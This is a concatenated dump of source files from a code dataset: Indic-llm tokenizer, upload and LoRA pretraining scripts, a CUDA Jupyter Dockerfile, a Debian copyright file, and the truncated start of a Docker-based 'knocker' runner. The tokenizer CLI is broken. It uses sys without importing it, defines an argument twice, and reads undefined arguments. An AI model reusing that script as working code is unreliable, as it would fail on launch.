import os
import json
import shutil
import logging
import argparse
from tqdm import tqdm
import pandas as pd
from datasets import load_dataset
from dataclasses import asdict
from pathlib import Path
wd = Path(__file__).parent.parent.resolve()
sys.path.append(str(wd))
from indic_llm.tokenization import SentencePieceTrainer
from indic_llm import print_indic_llm_text_art
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
class TokenizerCLI(SentencePieceTrainer):
def __init__(self) -> None:
super().__init__()
def run(self):
parser = argparse.ArgumentParser(
description="Tokenizer Script"
)
# Train arguments
parser.add_argument("--train", action="store_true", help="Enable training the tokenizer.")
parser.add_argument("--input-file", required=True, help="Path to the input text corpus file (should be a .txt file).")
parser.add_argument("--output-dir", default="./models", help="Directory to save the trained model and vocabulary.")
parser.add_argument("--model-prefix", default="SP_tokenizer", help="Name to save the SentencePiece model as.")
parser.add_argument("--vocab-size", type=int, default=self.vocab_size, help="Total vocabulary size of the tokenizer.")
parser.add_argument("--character-coverage", type=float, default=self.character_coverage, help="Character coverage for the model (default: 1.0).")
parser.add_argument("--model-type", default=self.model_type, choices=["bpe", "unigram", "char", "word"], help="Type of SentencePiece model.")
# Merge arguments
parser.add_argument("--merge", action="store_true", help="Enable merging two tokenizers.")
parser.add_argument("--base-tokenizer", type=str, help="Base tokenizer name or path.")
parser.add_argument("--trained-tokenizer", type=str, help="Tokenizer name or path to merge with the base tokenizer.")
# Test arguments
parser.add_argument("--test", action="store_true", help="Enable testing the tokenizer.")
parser.add_argument("--tokenizer-model", type=str, help="Name or path of the tokenizer model.")
parser.add_argument("--text", type=str, help="Input text to tokenize.")
# Count Indic tokens arguments
parser.add_argument("--count-indic-tokens", action="store_true", help="Count the number of Indic tokens using UTF-8 ranges.")
parser.add_argument("--tokenizer-model", type=str, help="Name or path to the tokenizer model.")
args = parser.parse_args()
# Initialize logger with appropriate log level
# Log parsed arguments
logger.info("Parsed arguments:")
for arg, value in vars(args).items():
logger.info(f"{arg}: {value}")
print_indic_llm_text_art()
logger.setLevel(logging.INFO)
self.vocab_size = args.vocab_size # 20000 by default
self.character_coverage = args.character_coverage # 1.0 by default
self.model_type = args.model_type #[BPE, unigram, char, word]
os.makedirs(self.output_dir, exist_ok=True)
if args.train:
self.train_tokenizer(args.text_corpus, args.model_prefix, args.output_dir)
elif args.merge:
self.merge_tokenizer(args.base_tokenizer,args.trained_tokenizer ,args.merged_output)
elif args.test:
self.test_tokenizer(args.tokenizer_model, args.text)
elif args.count_indic_tokens:
args.count_language_tokens(args.tokenizer_model)
# elif args.test_dataset:
# pass # feature to be added
else:
logger.error("Please provide either --train or --merge or --test option.")
if __name__ == "__main__":
tokenizer = TokenizerCLI()
tokenizer.run() | 3,925 | Python | .py | 73 | 46 | 153 | 0.679609 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,535 | push_to_hf.py | adithya-s-k_Indic-llm/scripts/push_to_hf.py | import argparse
import json
import logging
import os
from accelerate.state import PartialState
from huggingface_hub import HfApi
logging.basicConfig(
level=logging.INFO,
format="%(asctime)s - %(name)s - %(levelname)s - %(message)s",
)
logger = logging.getLogger(__name__)
def push_to_hub(target_model_path, repo_id, hf_token):
if PartialState().process_index == 0:
logger.info("Pushing model to hub...")
if os.path.exists(f"{target_model_path}/training_params.json"):
training_params = json.load(
open(f"{target_model_path}/training_params.json")
)
# Optionally, remove sensitive info if needed
# training_params.pop("token")
json.dump(
training_params, open(f"{target_model_path}/training_params.json", "w")
)
api = HfApi(token=hf_token)
api.create_repo(repo_id=repo_id, repo_type="model", private=True, exist_ok=True)
api.upload_folder(
folder_path=target_model_path, repo_id=repo_id, repo_type="model"
)
if __name__ == "__main__":
parser = argparse.ArgumentParser(description="Push model to Hugging Face Hub")
parser.add_argument(
"--target_model_path", required=True, help="Local path to the model directory"
)
parser.add_argument(
"--repo_id", required=True, help="Hugging Face Hub repository ID"
)
parser.add_argument(
"--hf_token", required=True, help="Hugging Face authentication token"
)
args = parser.parse_args()
push_to_hub(
target_model_path=args.target_model_path,
repo_id=args.repo_id,
hf_token=args.hf_token,
) | 1,699 | Python | .py | 45 | 30.711111 | 88 | 0.641555 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,536 | pretrain.py | adithya-s-k_Indic-llm/scripts/pretrain.py | #!/usr/bin/env python
# coding=utf-8
# Copyright 2020 The HuggingFace Inc. team. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
"""
Fine-tuning the library models for causal language modeling (GPT, GPT-2, CTRL, ...) on a text file or a dataset.
Here is the full list of checkpoints on the hub that can be fine-tuned by this script:
https://huggingface.co/models?filter=text-generation
"""
# You can also adapt this script on your own causal language modeling task. Pointers for this are left as comments.
import logging
import numpy as np
import math
import os
import sys
from dataclasses import dataclass, field
from itertools import chain
from typing import Optional, List, Dict, Any, Mapping
from pathlib import Path
import datasets
import torch
from datasets import load_dataset, concatenate_datasets
import transformers
from transformers import (
CONFIG_MAPPING,
MODEL_FOR_CAUSAL_LM_MAPPING,
AutoConfig,
AutoModelForCausalLM,
LlamaForCausalLM,
LlamaTokenizer,
AutoTokenizer,
HfArgumentParser,
Trainer,
TrainingArguments,
is_torch_tpu_available,
set_seed,
)
from transformers.testing_utils import CaptureLogger
from transformers.trainer_utils import get_last_checkpoint
from transformers.utils import send_example_telemetry
from transformers.utils.versions import require_version
from sklearn.metrics import accuracy_score
from peft import LoraConfig, TaskType, get_peft_model, PeftModel, get_peft_model_state_dict
from transformers.trainer_utils import PREFIX_CHECKPOINT_DIR
class SavePeftModelCallback(transformers.TrainerCallback):
def save_model(self, args, state, kwargs):
if state.best_model_checkpoint is not None:
checkpoint_folder = os.path.join(state.best_model_checkpoint, "pt_lora_model")
else:
checkpoint_folder = os.path.join(args.output_dir, f"{PREFIX_CHECKPOINT_DIR}-{state.global_step}")
peft_model_path = os.path.join(checkpoint_folder, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def on_save(self, args, state, control, **kwargs):
self.save_model(args, state, kwargs)
return control
def on_train_end(self, args, state, control, **kwargs):
peft_model_path = os.path.join(args.output_dir, "pt_lora_model")
kwargs["model"].save_pretrained(peft_model_path)
kwargs["tokenizer"].save_pretrained(peft_model_path)
def accuracy(predictions, references, normalize=True, sample_weight=None):
return {
"accuracy": float(
accuracy_score(references, predictions, normalize=normalize, sample_weight=sample_weight)
)
}
def compute_metrics(eval_preds):
preds, labels = eval_preds
# preds have the same shape as the labels, after the argmax(-1) has been calculated
# by preprocess_logits_for_metrics but we need to shift the labels
labels = labels[:, 1:].reshape(-1)
preds = preds[:, :-1].reshape(-1)
return accuracy(predictions=preds, references=labels)
def preprocess_logits_for_metrics(logits, labels):
if isinstance(logits, tuple):
# Depending on the model and config, logits may contain extra tensors,
# like past_key_values, but logits always come first
logits = logits[0]
return logits.argmax(dim=-1)
def fault_tolerance_data_collator(features: List) -> Dict[str, Any]:
if not isinstance(features[0], Mapping):
features = [vars(f) for f in features]
first = features[0]
batch = {}
# Special handling for labels.
# Ensure that tensor is created with the correct type
# (it should be automatically the case, but let's make sure of it.)
if "label" in first and first["label"] is not None:
label = first["label"].item() if isinstance(first["label"], torch.Tensor) else first["label"]
dtype = torch.long if isinstance(label, int) else torch.float
batch["labels"] = torch.tensor([f["label"] for f in features], dtype=dtype)
elif "label_ids" in first and first["label_ids"] is not None:
if isinstance(first["label_ids"], torch.Tensor):
batch["labels"] = torch.stack([f["label_ids"] for f in features])
else:
dtype = torch.long if isinstance(first["label_ids"][0], int) else torch.float
batch["labels"] = torch.tensor([f["label_ids"] for f in features], dtype=dtype)
# Handling of all other possible keys.
# Again, we will use the first element to figure out which key/values are not None for this model.
try:
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([f[k] for f in features])
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([f[k] for f in features]))
else:
batch[k] = torch.tensor([f[k] for f in features])
except ValueError: # quick fix by simply take the first example
for k, v in first.items():
if k not in ("label", "label_ids") and v is not None and not isinstance(v, str):
if isinstance(v, torch.Tensor):
batch[k] = torch.stack([features[0][k]] * len(features))
elif isinstance(v, np.ndarray):
batch[k] = torch.tensor(np.stack([features[0][k]] * len(features)))
else:
batch[k] = torch.tensor([features[0][k]] * len(features))
return batch
MODEL_CONFIG_CLASSES = list(MODEL_FOR_CAUSAL_LM_MAPPING.keys())
MODEL_TYPES = tuple(conf.model_type for conf in MODEL_CONFIG_CLASSES)
@dataclass
class ModelArguments:
"""
Arguments pertaining to which model/config/tokenizer we are going to fine-tune, or train from scratch.
"""
model_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The model checkpoint for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
tokenizer_name_or_path: Optional[str] = field(
default=None,
metadata={
"help": (
"The tokenizer for weights initialization.Don't set if you want to train a model from scratch."
)
},
)
model_type: Optional[str] = field(
default=None,
metadata={"help": "If training from scratch, pass a model type from the list: " + ", ".join(MODEL_TYPES)},
)
config_overrides: Optional[str] = field(
default=None,
metadata={
"help": (
"Override some existing default config settings when a model is trained from scratch. Example: "
"n_embd=10,resid_pdrop=0.2,scale_attn_weights=false,summary_type=cls_index"
)
},
)
config_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained config name or path if not the same as model_name"}
)
tokenizer_name: Optional[str] = field(
default=None, metadata={"help": "Pretrained tokenizer name or path if not the same as model_name"}
)
cache_dir: Optional[str] = field(
default=None,
metadata={"help": "Where do you want to store the pretrained models downloaded from huggingface.co"},
)
use_fast_tokenizer: bool = field(
default=True,
metadata={"help": "Whether to use one of the fast tokenizer (backed by the tokenizers library) or not."},
)
model_revision: str = field(
default="main",
metadata={"help": "The specific model version to use (can be a branch name, tag name or commit id)."},
)
use_auth_token: bool = field(
default=False,
metadata={
"help": (
"Will use the token generated when running `huggingface-cli login` (necessary to use this script "
"with private models)."
)
},
)
torch_dtype: Optional[str] = field(
default=None,
metadata={
"help": (
"Override the default `torch.dtype` and load the model under this dtype. If `auto` is passed, the "
"dtype will be automatically derived from the model's weights."
),
"choices": ["auto", "bfloat16", "float16", "float32"],
},
)
def __post_init__(self):
if self.config_overrides is not None and (self.config_name is not None or self.model_name_or_path is not None):
raise ValueError(
"--config_overrides can't be used in combination with --config_name or --model_name_or_path"
)
@dataclass
class DataTrainingArguments:
"""
Arguments pertaining to what data we are going to input our model for training and eval.
"""
dataset_dir: Optional[str] = field(
default=None, metadata={"help": "The name of the dataset to use (via the datasets library)."}
)
dataset_config_name: Optional[str] = field(
default=None, metadata={"help": "The configuration name of the dataset to use (via the datasets library)."}
)
train_file: Optional[str] = field(default=None, metadata={"help": "The input training data file (a text file)."})
validation_file: Optional[str] = field(
default=None,
metadata={"help": "An optional input evaluation data file to evaluate the perplexity on (a text file)."},
)
max_train_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of training examples to this "
"value if set."
)
},
)
max_eval_samples: Optional[int] = field(
default=None,
metadata={
"help": (
"For debugging purposes or quicker training, truncate the number of evaluation examples to this "
"value if set."
)
},
)
streaming: bool = field(default=False, metadata={"help": "Enable streaming mode"})
block_size: Optional[int] = field(
default=None,
metadata={
"help": (
"Optional input sequence length after tokenization. "
"The training dataset will be truncated in block of this size for training. "
"Default to the model max input length for single sentence inputs (take into account special tokens)."
)
},
)
overwrite_cache: bool = field(
default=False, metadata={"help": "Overwrite the cached training and evaluation sets"}
)
validation_split_percentage: Optional[float] = field(
default=0.05,
metadata={
"help": "The percentage of the train set used as validation set in case there's no validation split"
},
)
preprocessing_num_workers: Optional[int] = field(
default=None,
metadata={"help": "The number of processes to use for the preprocessing."},
)
keep_linebreaks: bool = field(
default=True, metadata={"help": "Whether to keep line breaks when using TXT files or not."}
)
data_cache_dir: Optional[str] = field(default="./", metadata={"help": "The datasets processed stored"})
def __post_init__(self):
if self.streaming:
require_version("datasets>=2.0.0", "The streaming feature requires `datasets>=2.0.0`")
@dataclass
class MyTrainingArguments(TrainingArguments):
trainable : Optional[str] = field(default="q_proj,v_proj")
lora_rank : Optional[int] = field(default=8)
lora_dropout : Optional[float] = field(default=0.1)
lora_alpha : Optional[float] = field(default=32.)
modules_to_save : Optional[str] = field(default=None)
debug_mode : Optional[bool] = field(default=False)
peft_path : Optional[str] = field(default=None)
logger = logging.getLogger(__name__)
def main():
parser = HfArgumentParser((ModelArguments, DataTrainingArguments, MyTrainingArguments))
if len(sys.argv) == 2 and sys.argv[1].endswith(".json"):
# If we pass only one argument to the script and it's the path to a json file,
# let's parse it to get our arguments.
model_args, data_args, training_args = parser.parse_json_file(json_file=os.path.abspath(sys.argv[1]))
else:
model_args, data_args, training_args = parser.parse_args_into_dataclasses()
# Sending telemetry. Tracking the example usage helps us better allocate resources to maintain them. The
# information sent is the one passed as arguments along with your Python/PyTorch versions.
send_example_telemetry("run_clm", model_args, data_args)
# Setup logging
logging.basicConfig(format="%(asctime)s - %(levelname)s - %(name)s - %(message)s",datefmt="%m/%d/%Y %H:%M:%S",
level=logging.INFO, # if training_args.local_rank in [-1, 0] else logging.WARN,
handlers=[logging.StreamHandler(sys.stdout)],)
if training_args.should_log:
# The default of training_args.log_level is passive, so we set log level at info here to have that default.
transformers.utils.logging.set_verbosity_info()
log_level = training_args.get_process_log_level()
logger.setLevel(log_level)
datasets.utils.logging.set_verbosity(log_level)
transformers.utils.logging.set_verbosity(log_level)
transformers.utils.logging.enable_default_handler()
transformers.utils.logging.enable_explicit_format()
# transformers.tokenization_utils.logging.set_verbosity_warning()
# Log on each process the small summary:
logger.warning(
f"Process rank: {training_args.local_rank}, device: {training_args.device}, n_gpu: {training_args.n_gpu}"
+ f"distributed training: {bool(training_args.local_rank != -1)}, 16-bits training: {training_args.fp16}"
)
# Detecting last checkpoint.
last_checkpoint = None
if os.path.isdir(training_args.output_dir) and training_args.do_train and not training_args.overwrite_output_dir:
last_checkpoint = get_last_checkpoint(training_args.output_dir)
if last_checkpoint is None and len(os.listdir(training_args.output_dir)) > 0:
raise ValueError(
f"Output directory ({training_args.output_dir}) already exists and is not empty. "
"Use --overwrite_output_dir to overcome."
)
elif last_checkpoint is not None and training_args.resume_from_checkpoint is None:
logger.info(
f"Checkpoint detected, resuming training at {last_checkpoint}. To avoid this behavior, change "
"the `--output_dir` or add `--overwrite_output_dir` to train from scratch."
)
# Set seed before initializing model.
set_seed(training_args.seed)
config_kwargs = {
"cache_dir": model_args.cache_dir,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.config_name:
config = AutoConfig.from_pretrained(model_args.config_name, **config_kwargs)
elif model_args.model_name_or_path:
config = AutoConfig.from_pretrained(model_args.model_name_or_path, **config_kwargs)
else:
config = CONFIG_MAPPING[model_args.model_type]()
logger.warning("You are instantiating a new config instance from scratch.")
if model_args.config_overrides is not None:
logger.info(f"Overriding config: {model_args.config_overrides}")
config.update_from_string(model_args.config_overrides)
logger.info(f"New config: {config}")
tokenizer_kwargs = {
"cache_dir": model_args.cache_dir,
"use_fast": model_args.use_fast_tokenizer,
"revision": model_args.model_revision,
"use_auth_token": True if model_args.use_auth_token else None,
}
if model_args.tokenizer_name:
tokenizer = AutoTokenizer.from_pretrained(model_args.tokenizer_name, **tokenizer_kwargs)
elif model_args.tokenizer_name_or_path:
tokenizer = LlamaTokenizer.from_pretrained(model_args.tokenizer_name_or_path, **tokenizer_kwargs)
else:
raise ValueError(
"You are instantiating a new tokenizer from scratch. This is not supported by this script."
"You can do it from another script, save it, and load it from here, using --tokenizer_name."
)
# Preprocessing the datasets.
# First we tokenize all the texts.
# since this will be pickled to avoid _LazyModule error in Hasher force logger loading before tokenize_function
tok_logger = transformers.utils.logging.get_logger("transformers.tokenization_utils_base")
def tokenize_function(examples):
with CaptureLogger(tok_logger) as cl:
output = tokenizer(examples["text"])
# clm input could be much much longer than block_size
if "Token indices sequence length is longer than the" in cl.out:
tok_logger.warning(
"^^^^^^^^^^^^^^^^ Please ignore the warning above - this long input will be chunked into smaller bits"
" before being passed to the model."
)
return output
if data_args.block_size is None:
block_size = tokenizer.model_max_length
if block_size > 1024:
logger.warning(
"The chosen tokenizer supports a `model_max_length` that is longer than the default `block_size` value"
" of 1024. If you would like to use a longer `block_size` up to `tokenizer.model_max_length` you can"
" override this default with `--block_size xxx`."
)
block_size = 1024
else:
if data_args.block_size > tokenizer.model_max_length:
logger.warning(
f"The block_size passed ({data_args.block_size}) is larger than the maximum length for the model"
f"({tokenizer.model_max_length}). Using block_size={tokenizer.model_max_length}."
)
block_size = min(data_args.block_size, tokenizer.model_max_length)
# Main data processing function that will concatenate all texts from our dataset and generate chunks of block_size.
def group_texts(examples):
# Concatenate all texts.
concatenated_examples = {k: list(chain(*examples[k])) for k in examples.keys()}
total_length = len(concatenated_examples[list(examples.keys())[0]])
# We drop the small remainder, we could add padding if the model supported it instead of this drop, you can
# customize this part to your needs.
if total_length >= block_size:
total_length = (total_length // block_size) * block_size
# Split by chunks of max_len.
result = {
k: [t[i : i + block_size] for i in range(0, total_length, block_size)]
for k, t in concatenated_examples.items()
}
result["labels"] = result["input_ids"].copy()
return result
with training_args.main_process_first(desc="dataset map tokenization and grouping"):
lm_datasets = []
path = Path(data_args.dataset_dir)
files = [file.name for file in path.glob("*.txt")]
if training_args.debug_mode is True:
files = [files[0]]
for idx, file in enumerate(files):
data_file = os.path.join(path, file)
filename = ''.join(file.split(".")[:-1])
cache_path = os.path.join(data_args.data_cache_dir, filename)
os.makedirs(cache_path, exist_ok=True)
try:
processed_dataset = datasets.load_from_disk(cache_path, keep_in_memory=False)
logger.info(f'training datasets-{filename} has been loaded from disk')
except Exception:
cache_dir = os.path.join(data_args.data_cache_dir, filename+"_text")
os.makedirs(cache_dir, exist_ok=True)
raw_dataset = load_dataset("text", data_files=data_file, cache_dir=cache_dir, keep_in_memory=False)
logger.info(f"{file} has been loaded")
tokenized_dataset = raw_dataset.map(
tokenize_function,
batched=True,
num_proc=data_args.preprocessing_num_workers,
remove_columns="text",
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'tokenized.arrow') for k in raw_dataset},
desc="Running tokenizer on dataset",
)
grouped_datasets = tokenized_dataset.map(
group_texts,
batched=True,
num_proc=data_args.preprocessing_num_workers,
load_from_cache_file=True,
keep_in_memory=False,
cache_file_names = {k: os.path.join(cache_dir, 'grouped.arrow') for k in tokenized_dataset},
desc=f"Grouping texts in chunks of {block_size}",
)
processed_dataset = grouped_datasets
processed_dataset.save_to_disk(cache_path)
if idx == 0:
lm_datasets = processed_dataset['train']
else:
assert lm_datasets.features.type == processed_dataset["train"].features.type
lm_datasets = concatenate_datasets([lm_datasets, processed_dataset["train"]])
lm_datasets = lm_datasets.train_test_split(test_size = data_args.validation_split_percentage)
if training_args.do_train:
train_dataset = lm_datasets['train']
if data_args.max_train_samples is not None:
max_train_samples = min(len(train_dataset), data_args.max_train_samples)
train_dataset = train_dataset.select(range(max_train_samples))
logger.info(f"Num train_samples {len(train_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(train_dataset[0]['input_ids']))
if training_args.do_eval:
eval_dataset = lm_datasets["test"]
if data_args.max_eval_samples is not None:
max_eval_samples = min(len(eval_dataset), data_args.max_eval_samples)
eval_dataset = eval_dataset.select(range(max_eval_samples))
logger.info(f"Num eval_samples {len(eval_dataset)}")
logger.info("training example:")
logger.info(tokenizer.decode(eval_dataset[0]['input_ids']))
if model_args.model_name_or_path:
torch_dtype = (
model_args.torch_dtype
if model_args.torch_dtype in ["auto", None]
else getattr(torch, model_args.torch_dtype)
)
model = LlamaForCausalLM.from_pretrained(
model_args.model_name_or_path,
from_tf=bool(".ckpt" in model_args.model_name_or_path),
config=config,
cache_dir=model_args.cache_dir,
revision=model_args.model_revision,
use_auth_token=True if model_args.use_auth_token else None,
torch_dtype=torch_dtype,
low_cpu_mem_usage=True
)
else:
model = AutoModelForCausalLM.from_config(config)
n_params = sum({p.data_ptr(): p.numel() for p in model.parameters()}.values())
logger.info(f"Training new model from scratch - Total size={n_params/2**20:.2f}M params")
# model_vocab_size = model.get_output_embeddings().weight.size(0)
# if not (
# (model_vocab_size==32000 and len(tokenizer)==49953) or \
# (model_vocab_size==32000 and len(tokenizer)==32000) or \
# (model_vocab_size==49953 and len(tokenizer)==49953) or \
# (model_vocab_size==49954 and len(tokenizer)==49954)
# ):
# raise ValueError(
# f"The combination of base model (size: {model_vocab_size}) and tokenizer (size: {len(tokenizer)}) is not a valid configuration. Please check our project wiki for further information. \n"
# "Valid configurations (base model / tokenizer):\n"
# "- Continue pre-training original LLaMA: 32000 / 32000 \n"
# "- Pre-training Chinese LLaMA based on original LLaMA: 32000 / 49953 \n"
# "- Continue pre-training Chinese LLaMA: 49953 / 49953 \n"
# "- Continue pre-training Chinese Alpaca: 49954 / 49954 \n")
model.resize_token_embeddings(len(tokenizer))
if training_args.peft_path is not None:
logger.info("Peft from pre-trained model")
model = PeftModel.from_pretrained(model, training_args.peft_path)
else:
logger.info("Init new peft model")
target_modules = training_args.trainable.split(',')
modules_to_save = training_args.modules_to_save
if modules_to_save is not None:
modules_to_save = modules_to_save.split(',')
lora_rank = training_args.lora_rank
lora_dropout = training_args.lora_dropout
lora_alpha = training_args.lora_alpha
logger.info(f"target_modules: {target_modules}")
logger.info(f"lora_rank: {lora_rank}")
peft_config = LoraConfig(
task_type=TaskType.CAUSAL_LM,
target_modules=target_modules,
inference_mode=False,
r=lora_rank, lora_alpha=lora_alpha,
lora_dropout=lora_dropout,
modules_to_save=modules_to_save)
model = get_peft_model(model, peft_config)
model.print_trainable_parameters()
old_state_dict = model.state_dict
model.state_dict = (
lambda self, *_, **__: get_peft_model_state_dict(self, old_state_dict())
).__get__(model, type(model))
# Initialize our Trainer
trainer = Trainer(
model=model,
args=training_args,
train_dataset=train_dataset if training_args.do_train else None,
eval_dataset=eval_dataset if training_args.do_eval else None,
tokenizer=tokenizer,
data_collator=fault_tolerance_data_collator,
compute_metrics=compute_metrics if training_args.do_eval and not is_torch_tpu_available() else None,
preprocess_logits_for_metrics=preprocess_logits_for_metrics
if training_args.do_eval and not is_torch_tpu_available()
else None,
)
trainer.add_callback(SavePeftModelCallback)
# Training
if training_args.do_train:
checkpoint = None
if training_args.resume_from_checkpoint is not None:
checkpoint = training_args.resume_from_checkpoint
elif last_checkpoint is not None:
checkpoint = last_checkpoint
train_result = trainer.train(resume_from_checkpoint=checkpoint)
metrics = train_result.metrics
max_train_samples = (
data_args.max_train_samples if data_args.max_train_samples is not None else len(train_dataset)
)
metrics["train_samples"] = min(max_train_samples, len(train_dataset))
trainer.log_metrics("train", metrics)
trainer.save_metrics("train", metrics)
trainer.save_state()
# Evaluation
if training_args.do_eval:
logger.info("*** Evaluate ***")
metrics = trainer.evaluate()
max_eval_samples = data_args.max_eval_samples if data_args.max_eval_samples is not None else len(eval_dataset)
metrics["eval_samples"] = min(max_eval_samples, len(eval_dataset))
try:
perplexity = math.exp(metrics["eval_loss"])
except OverflowError:
perplexity = float("inf")
metrics["perplexity"] = perplexity
trainer.log_metrics("eval", metrics)
trainer.save_metrics("eval", metrics)
if __name__ == "__main__":
main() | 28,340 | Python | .py | 574 | 40.569686 | 200 | 0.647099 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,537 | jupyter.dockerfile | adithya-s-k_Indic-llm/docker_environment/jupyter.dockerfile | ARG CUDA_VERSION="11.8.0"
ARG CUDNN_VERSION="8"
ARG UBUNTU_VERSION="22.04"
ARG MAX_JOBS=4
FROM nvidia/cuda:$CUDA_VERSION-cudnn$CUDNN_VERSION-devel-ubuntu$UBUNTU_VERSION as base-builder
ENV PATH="/root/miniconda3/bin:${PATH}"
ARG PYTHON_VERSION="3.9"
ARG PYTORCH_VERSION="2.0.1"
ARG CUDA="118"
ARG TORCH_CUDA_ARCH_LIST="7.0 7.5 8.0 8.6 9.0+PTX"
ENV PYTHON_VERSION=$PYTHON_VERSION
ENV TORCH_CUDA_ARCH_LIST=$TORCH_CUDA_ARCH_LIST
RUN apt-get update \
&& apt-get install -y wget git build-essential ninja-build git-lfs libaio-dev && rm -rf /var/lib/apt/lists/* \
&& wget \
https://repo.anaconda.com/miniconda/Miniconda3-latest-Linux-x86_64.sh \
&& mkdir /root/.conda \
&& bash Miniconda3-latest-Linux-x86_64.sh -b \
&& rm -f Miniconda3-latest-Linux-x86_64.sh \
&& conda create -n "py${PYTHON_VERSION}" python="${PYTHON_VERSION}"
ENV PATH="/root/miniconda3/envs/py${PYTHON_VERSION}/bin:${PATH}"
WORKDIR /workspace
RUN python3 -m pip install --upgrade pip && pip3 install packaging && \
python3 -m pip install --no-cache-dir -U torch==${PYTORCH_VERSION}+cu${CUDA} deepspeed-kernels --extra-index-url https://download.pytorch.org/whl/cu$CUDA
RUN git lfs install --skip-repo && \
pip3 install awscli && \
# The base image ships with `pydantic==1.8.2` which is not working
pip3 install -U --no-cache-dir pydantic==1.10.10
RUN pip install \
numpy \
torch \
jupyterlab
# start jupyter lab
CMD ["jupyter", "lab", "--ip=0.0.0.0", "--port=8888", "--allow-root", "--no-browser"]
EXPOSE 8888 | 1,541 | Python | .pyt | 35 | 41.142857 | 157 | 0.704545 | adithya-s-k/Indic-llm | 8 | 1 | 0 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,538 | copyright | amateur80lvl_lxcex/packages/uidmapshift/debian/copyright | Format: https://www.debian.org/doc/packaging-manuals/copyright-format/1.0/
Upstream-Name: uidmapshift
Upstream-Contact: Serge Hallyn <[email protected]>
Source: http://bazaar.launchpad.net/~serge-hallyn/+junk/nsexec/view/head:/uidmapshift.c
Files: *
Copyright: 2024 Anonymous
License: GPL-2.0
Files: uidmapshift.c
Copyright: 2012-2016 Canonical, Inc
License: GPL-2.0
License: GPL-2.0
On Debian systems the full text of the GPL-2 can be found in
/usr/share/common-licenses/GPL-2
| 503 | Python | .py | 13 | 37.153846 | 87 | 0.778234 | amateur80lvl/lxcex | 8 | 1 | 1 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,539 | knock.py | loredous_tommyknocker/src/python/knocker/knock.py | import logging
from typing import Any
from statemachine import State, StateMachine
import docker
from shared.models.objects import Knock, Runner, Test
class ActiveKnock(StateMachine):
"""A state machine for tracking the status of knocks and updating their status with the controller"""
pending = State(initial=True)
pulling = State()
running = State()
complete = State(final=True)
errored = State(final=True)
cycle = pending.to(pulling) | pulling.to(running, cond="pull_complete") | running.to(complete, cond="run_complete")
fail = pending.to(errored) | pulling.to(errored) | running.to(errored)
pull_complete = False
container = None
def __init__(self, knock: Knock, runner: Runner, test: Test, state_field: str = "state", start_value: Any = None, rtc: bool = True, allow_event_without_transition: bool = False):
super().__init__(None, state_field, start_value, rtc, allow_event_without_transition)
self.logger = logging.getLogger("ActiveKnock")
self._docker_client = docker.from_env()
self.knock = knock
self.test = test
self.runner = runner
self.state_message = ""
self.output = ""
self.exit_code = None
def before_cycle(self, event: str, source: State, target: State, message: str = ""):
self.logger.debug(f"Transitioning {self.knock.id} from {source.name} to {target.name} with message {message}")
def on_enter_pulling(self, event: str, source: State, target: State, message: str = ""):
try:
self._docker_client.images.pull(self.runner.image_name, self.runner.image_tag)
self.pull_complete = True
except docker.errors.APIError as err:
self.logger.error(f"Failed to pull image for knock {self.knock.id}: {err}")
self.state_message = f"Failed to pull image for knock {self.knock.id}: {err}"
self.fail()
def on_enter_running(self, event: str, source: State, target: State, message: str = ""):
try:
self.container = self._docker_client.containers.run(self.runner.image_name, self.knock.command, detach=True)
except docker.errors.APIError as err:
self.logger.error(f"Failed to run image for knock {self.knock.id}: {err}")
self.state_message = f"Failed to run image for knock {self.knock.id}: {err}"
self.fail()
def run_complete(self) -> bool:
self.container.reload()
return self.container.status == "exited"
def on_enter_complete(self, event: str, source: State, target: State, message: str = ""):
self.logger.info(f"Knock {self.knock.id} complete")
self.state_message = f"Knock {self.knock.id} complete"
result = self.container.wait()
self.exit_code = result.pop("StatusCode")
self.output = self.container.logs(stdout=True, stderr=False)
self.logger.debug(f"Knock {self.knock.id} exited with status code {self.exit_code} and output:\n {self.output}")
self.container.remove() | 3,050 | Python | .py | 54 | 48.555556 | 182 | 0.666555 | loredous/tommyknocker | 8 | 0 | 9 | GPL-3.0 | 9/5/2024, 10:48:01 PM (Europe/Amsterdam) |
2,286,540 | service.py | loredous_tommyknocker/src/python/knocker/service.py | import asyncio
from dataclasses import dataclass, asdict
from logging import getLogger
import sched
from typing import Dict, List
from uuid import UUID
import requests
from shared.models.objects import Result, Test, Knock, TestConfiguration, TestComponentStatus, Runner
from shared.models.apiobjects import NewTestComponentStatus, UpdatedTestComponentStatus
from shared.models.enums import ComponentStatus, TestStatus, ComponentType
from knocker.knock import ActiveKnock
@dataclass
class KnockerConfig:
controller: str
port: int
interval: int
identity: str
def __str__(self) -> str:
return str(vars(self))
class v1ControllerAPIInteractor:
